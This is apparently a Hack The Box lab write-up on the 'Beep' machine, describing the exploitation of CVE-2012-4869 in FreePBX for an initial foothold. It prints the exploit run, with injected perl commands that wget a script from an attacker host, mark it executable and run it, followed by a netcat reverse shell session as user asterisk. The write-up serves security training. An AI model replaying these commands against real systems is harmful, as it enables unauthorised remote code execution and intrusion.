Confirming the version of the FreePBX instance gave me an opportunity to look for more potential vulnerabilities that would provide an initial foothold. I came across CVE-2012-4869.
CVE-2012-4869
This vulnerability allows an attacker to include arbitrary files on the affected system, including sensitive files such as the /etc/amportal.conf file, by sending a specially crafted HTTP request to the vulnerable script with a parameter that contains the path to the file the attacker wants to include. The path can include "../" sequences to navigate to parent directories, which allows an attacker to include any file on the file system that the web server process has permission to read.
Exploiting this vulnerability allows an attacker to view the contents of sensitive files, such as the amportal.conf file, which could contain credentials and other sensitive information that could be used to compromise the system. Additionally, an attacker could use this vulnerability to include and execute arbitrary scripts, which could lead to complete compromise of the affected system.
Exploit
Found the exploit online
Execution
┌──(kali㉿kali)-[~/archive/htb/labs/beep]
└─$ python2 cve-2012-4869.py 'https://10.10.10.7' 10.10.14.5 4444 1
[+] LHOST = 10.10.14.5
[+] LPORT = 4444
[+] Build payload
[+] Shell listen
Traceback (most recent call last):
File "elastix.py", line 288, in <module>
s = Shell((LHOST, int(LPORT)), bind=True)
File "elastix.py", line 109, in __init__
self.sock.bind(self.addr)
File "/usr/lib/python2.7/socket.py", line 228, in meth
[+] HTTP Listen = 8888
return getattr(self._sock,name)(*args)
socket.error: [Errno 98] Address already in use
[+] command: perl -MIO -e 'system("wget -P /tmp http://10.10.14.7:8888/exploit.sh");'
[+] command: perl -MIO -e 'system("chmod +x /tmp/exploit.sh");'
[+] command: perl -MIO -e 'system("/tmp/exploit.sh");'
Executed the exploit.
I was a bit worried when Python threw an error about the address already being in use, as I was running the Netcat listener on the same port, because I initially thought that the exploit itself wouldn't provide the listener.
Nevertheless, the exploit went ahead and continued the program.
┌──(kali㉿kali)-[~/archive/htb/labs/beep]
└─$ nnc 4444
listening on [any] 4444 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.7] 58017
whoami
asterisk
hostname
beep
ifconfig
eth0 Link encap:Ethernet HWaddr 00:50:56:B9:A3:13
inet addr:10.10.10.7 Bcast:10.10.10.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:3702241 errors:0 dropped:0 overruns:0 frame:0
TX packets:2360768 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:442710719 (422.2 MiB) TX bytes:728971753 (695.2 MiB)
Interrupt:59 Base address:0x2024
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:14993 errors:0 dropped:0 overruns:0 frame:0
TX packets:14993 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:1555181 (1.4 MiB) TX bytes:1555181 (1.4 MiB)
Initial foothold established as asterisk via exploiting CVE-2012-4869 on the target web application.